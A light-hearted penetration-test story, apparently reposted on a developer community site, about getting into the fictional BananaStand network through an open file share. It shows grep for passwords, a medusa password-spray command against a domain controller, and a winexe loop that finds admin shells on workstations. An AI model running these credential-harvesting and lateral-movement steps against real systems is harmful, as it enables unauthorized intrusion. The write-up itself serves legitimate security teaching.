开发者社区> cnbird> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

It Takes Two to Tango (myself, and your unprotected file share)

简介: BananaStand learned from last time (to see last time, go here).
+关注继续查看
BananaStand learned from last time (to see last time, go here). Systems were patched, ACL's were locked down, SIEM was tuned, and the security team got a new coffee pot just to help keep them on edge. Round 2 of our test started early on a Monday morning from within a far away remote office full of developers. At first, I didn’t find a thing. I spent what seemed like weeks looking for a way in. I started to doubt my life as a pentester, and began to think if I too could sell frozen bananas to pay the bills. It couldn't be that bad, I'm a fan of bananas. Set my own hours, hone my salesman skills, get my daily allotment of potassium… Then, just as I was drafting my resignation email, I saw a flicker on my terminal: 
[+] Attempting to map shares on 10.2.1.61
//10.2.1.61/test_share  Mapping: OK, Listing: OK

A share we can access! I save my resignation email as a draft, and start enumerating this machine. Looks like a developers OSX machine, with the test_share directory shared out to the world. I mount the share and start digging around. Looks like some old DB import scripts, snippets of source code, test data, Sharon.avi (which im afraid to click on), and various other nuggets of gold. As you should do with any unknown files, I grepped through them for 'password': 
# grep -ri password /mnt/test_share/

./test_share/archive/Test/ab2.php:define("PASSWORD", "chillyBanana8"); // Your default super-secret password.
./test_share/archive/OLD/test/config.php:// username and password to log onto db server
./test_share/archive/OLD/test/config.php:$dbpassword='gigglebits';

Awesome, some potentially valid passwords. I tried connecting directly to the db, but it was offline. I bet that chillyBanana8 password is used in more places than this. I wanted to try it against some domain users, so I grepped through the share with a regex that would extract every email address ending in @bananastand.com, giving us a nice list of 35 or so users. Then, I fired up medusa with our userlist and the password we found in the source code against a Domain Controller: 
medusa -h 10.2.1.10 -U users.from.source.code -p chillyBanana8 -e ns -M smbnt
...
ACCOUNT FOUND: [smbnt] Host: 10.250.194.11 User: gmbluth Password: chillyBanana8 [SUCCESS]

Great! Now we have a valid user account on the BananaStand domain. My next step is to see where this little guy has admin access. Lets just write winexe into a quick for loop. Where we get 'ACCESS_DENIED', we don't have administrative access to the system. Where we get a shell, we do :) 
for i in $(cat smb.hosts); do echo $i; ./winexe -U mbluth%chillyBanana8 --uninstall //$i cmd; done
10.2.1.25
ERROR: Failed to open connection - NT_STATUS_ACCESS_DENIED
10.2.1.31
ERROR: Failed to open connection - NT_STATUS_ACCESS_DENIED
10.2.1.32
ERROR: Failed to open connection - NT_STATUS_ACCESS_DENIED
10.2.1.33
ERROR: Failed to open connection - NT_STATUS_ACCESS_DENIED
10.2.1.35
ERROR: Failed to open connection - NT_STATUS_ACCESS_DENIED
10.2.1.38
ERROR: Failed to open connection - NT_STATUS_ACCESS_DENIED
10.2.1.42
ERROR: Failed to open connection - NT_STATUS_ACCESS_DENIED
10.2.1.43
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : BANANASTAND
   IPv4 Address. . . . . . . . . . . : 10.2.1.43
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.2.1.1

Shazam! Our compromised user account gives us admin access to the workstation (enough to run winexe / psexec and compromise the box, anyways). From here, we have any number of paths to work our way up to a higher privilege level, and then start the long hunt for access into their DMZ and recovery of critical data (most likely secret banana recipes). As I furiously type an email to my boss demanding a raise, I start to chuckle at my imagined life as a banana salesman. It wouldn't be all bad I suppose. Any way you look at it, theres always money in the BananaStand.

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
SAP UI5 应用读取 CSRF token 的 HTTP head 请求逻辑解析
SAP UI5 应用读取 CSRF token 的 HTTP head 请求逻辑解析
23 0
why my detail page in SAP UI5 application is failed to be loaded from router
why my detail page in SAP UI5 application is failed to be loaded from router
37 0
Using Transparent Database Encryption in Oracle Database 11g
http://www.oracle.com/webfolder/technetwork/tutorials/obe/db/11g/r1/prod/security/tde/tde.
1083 0
+关注
cnbird
阿里云安全专家,主要负责阿里云云产品安全。
4032
文章
3
问答
文章排行榜
最热
最新
相关电子书
更多
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载
冬季实战营第三期:MySQL数据库进阶实战
立即下载